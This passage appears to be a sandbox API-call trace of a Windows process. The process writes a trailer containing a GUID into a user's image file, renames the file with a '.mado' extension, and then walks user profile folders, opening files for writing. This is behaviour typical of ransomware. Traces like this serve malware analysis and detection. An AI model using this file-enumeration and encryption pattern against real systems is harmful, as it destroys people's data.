0x3277198 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe520 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe508 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.851] GetCurrentThreadId () returned 0x600 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72830 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.852] GetCurrentThreadId () returned 0x600 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.854] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x123f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.854] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.854] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.854] CloseHandle (hObject=0x63c) returned 1 [0204.855] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZS3LC6n3UMM.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zs3lc6n3umm.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZS3LC6n3UMM.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zs3lc6n3umm.gif.mado")) returned 1 [0204.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.858] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.859] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0 [0204.859] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.859] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.859] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0204.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.859] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.859] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.859] PathFindFileNameW (pszPath="") returned="" [0204.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0xffffffff [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff1f8 | out: hHeap=0x2c0000) returned 1 [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.860] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.860] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0204.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.860] PathFindFileNameW (pszPath="") returned="" [0204.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0xffffffff [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.860] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.860] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0204.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.861] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.861] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.861] PathFindFileNameW (pszPath="") returned="" [0204.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff1f8 | out: hHeap=0x2c0000) returned 1 [0204.861] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.861] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.861] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.861] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0204.861] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.861] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.861] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0204.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.861] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.861] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.862] PathFindFileNameW (pszPath="") returned="" [0204.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.862] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.862] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.862] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0204.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.862] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0204.862] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0204.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.862] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0204.862] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0204.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.862] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0204.862] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.863] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.863] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0204.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.863] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.863] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.863] PathFindFileNameW (pszPath="") returned="" [0204.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.863] 